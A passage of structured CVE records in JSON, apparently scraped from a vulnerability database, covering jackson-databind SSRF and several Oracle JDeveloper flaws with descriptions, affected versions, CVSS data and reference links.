"n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "33525", refsource: "SECUNIA", url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", refsource: "VUPEN", url: "http://www.vupen.com/english/advisories/2009/0115", }, { name: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", refsource: "SECTRACK", url: "http://www.securitytracker.com/id?1021572", }, { name: "33177", refsource: "BID", url: "http://www.securityfocus.com/bid/33177", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2008-2623", datePublished: "2009-01-14T02:00:00", dateReserved: "2008-06-09T00:00:00", dateUpdated: "2024-08-07T09:05:30.403Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14721
Vulnerability from cvelistv5
Published
2019-01-02 18:00
Modified
2024-08-05 09:38
Severity ?
EPSS score ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.150Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:06", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14721", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14721", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.150Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2005-2291
Vulnerability from cvelistv5
Published
2005-07-17 04:00
Modified
2024-08-07 22:22
Severity ?
EPSS score ?
Summary
Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=112129082323341&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html | x_refsource_MISC |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T22:22:47.768Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2005-07-13T00:00:00", descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2016-10-17T13:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { tags: [ "x_refsource_MISC", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2005-2291", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 passes the cleartext password as a parameter when starting sqlplus, which allows local users to gain sensitive information.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "20050713 Advisory: Oracle JDeveloper passes Plaintext Password", refsource: "BUGTRAQ", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { name: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", refsource: "MISC", url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2005-2291", datePublished: "2005-07-17T04:00:00", dateReserved: "2005-07-17T00:00:00", dateUpdated: "2024-08-07T22:22:47.768Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-10273
Vulnerability from cvelistv5
Published
2018-01-18 02:00
Modified
2024-10-04 16:38
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/102569 | vdb-entry, x_refsource_BID | |
| https://www.exploit-db.com/exploits/43848/ | exploit, x_refsource_EXPLOIT-DB | |
| http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | x_refsource_CONFIRM | |
| http://www.securitytracker.com/id/1040207 | vdb-entry, x_refsource_SECTRACK |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | JDeveloper |
Version: 11.1.1.7.0 Version: 11.1.1.7.1 Version: 11.1.1.9.0 Version: 11.1.2.4.0 Version: 12.1.3.0.0 Version: 12.2.1.2.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T17:33:17.014Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "102569", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", tags: [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred", ], url: "https://www.exploit-db.com/exploits/43848/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040207", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2017-10273", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-04T15:41:34.170666Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-04T16:38:51.515Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle Corporation", versions: [ { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.7.1", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "11.1.2.4.0", }, { status: "affected", version: "12.1.3.0.0", }, { status: "affected", version: "12.2.1.2.0", }, ], }, ], datePublic: "2017-09-12T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], problemTypes: [ { descriptions: [ { description: "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2018-01-23T10:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { name: "102569", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", tags: [ "exploit", "x_refsource_EXPLOIT-DB", ], url: "https://www.exploit-db.com/exploits/43848/", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040207", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2017-10273", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_affected: "=", version_value: "11.1.1.7.0", }, { version_affected: "=", version_value: "11.1.1.7.1", }, { version_affected: "=", version_value: "11.1.1.9.0", }, { version_affected: "=", version_value: "11.1.2.4.0", }, { version_affected: "=", version_value: "12.1.3.0.0", }, { version_affected: "=", version_value: "12.2.1.2.0", }, ], }, }, ], }, vendor_name: "Oracle Corporation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper.", }, ], }, ], }, references: { reference_data: [ { name: "102569", refsource: "BID", url: "http://www.securityfocus.com/bid/102569", }, { name: "43848", refsource: "EXPLOIT-DB", url: "https://www.exploit-db.com/exploits/43848/", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "1040207", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040207", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2017-10273", datePublished: 